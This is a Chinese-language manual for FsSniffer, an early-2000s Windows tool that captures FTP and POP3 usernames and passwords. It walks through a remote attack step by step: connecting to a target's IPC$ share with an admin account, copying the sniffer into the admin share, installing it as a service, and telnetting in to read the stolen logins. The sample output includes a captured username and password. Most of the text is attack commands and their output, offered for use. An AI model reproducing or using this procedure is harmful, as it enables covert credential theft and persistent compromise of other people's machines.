流影 POP3/FTP Sniffer 说明

FsSniffer只能在Windows 2000中使用，可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP：指绑定的IP地址，通常就是本地主机IP地址。Port：控制的端口，以后要通过这个端口登陆上去查看结果。Control Password：登陆时的密码。登陆上去后的命令Show Result：查看捕获的记录Quit：退出ShutDown：结束Sniffer的运行二、远程使用例如：得到主机211.152.188.1的一个属于管理员组的帐号test:test，首先登录。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.将fssniffer.exe复制到远程主机。(也可以用流光IV中提供的工具“种植者”来做这件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied.　利用流光IV中的NTCMD启动FsSniffer.EXE，并将器安装成为服务=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 这样在远程主机上面安装了一个服务ShadowSniffer。用net命令启动服务NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安装成为服务的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:远程主机的用户名（必须具有超级用户权限)Passwod:远程主机的密码Service Name:安装的服务名称，如果安装失败，可以将FsSniffer.exe改名再试。Bind Local IP:远程主机的IP。某些主机具有两个IP地址，这是就需要根据需要选择监听的IP地址(例如：局域网和外网)Port:远程控制的端口Control Password:远程控制的密码过一段时间就可以登陆到FsSniffer开的端口7上面，查看结果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕软件实验室&#8482; 1995-2001版权所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com